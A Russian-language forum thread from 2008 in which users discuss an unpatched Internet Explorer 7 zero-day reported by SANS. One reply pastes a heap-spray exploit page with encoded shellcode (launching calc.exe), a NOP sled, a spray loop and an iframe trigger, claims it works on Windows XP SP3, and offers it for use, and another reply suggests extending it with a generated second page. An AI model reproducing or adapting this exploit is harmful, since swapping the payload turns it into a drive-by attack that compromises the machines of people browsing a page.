IE7 свежая дырка

[BadBlock]

12/10 22:28 GMT by T : OK, there might have been more than one: reader Simon (S2) writes "There is an even more serious flaw ... From SANS: 'There is a 0-day exploit for Internet Explorer circulating in the wild. At this point in time it does not appear to be wildly used, but as the code is publicly available we can expect that this will happen very soon. This is a brand new exploit that is *not* patched with MS08-073 that was released yesterday. I can confirm that the exploit works in a fully patched Windows XP machine. The exploit is a typical heap overflow that appears to be exploiting something in the XML parser.'"

http://it.slashdot.org/it/08/12/10/206216.shtml

Пока из IE7 на незнакомые сайты ходить не буду.

[Rootz]

IE8 поставь...

[BadBlock]

Бету-то? Наф...

[Desperanto]

у меня 8 глючит ппц как...сидю на жопере

[Старый_прохиндей]

<html>
<script>

// 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13

// windows/exec - 141 bytes

// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0a0a%u0a0a");
var nops = unescape("%u9090%u9090%u9090");


while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory += (block + nops + shellcode);

document.write("<iframe src=\"iframe.html\">");

</script>


</html>

Юзайте на здоровье)

[demien]

iframe.html надо бы еще динамическисгенерировать и там тоже какой-нибудь хуенг написать ))))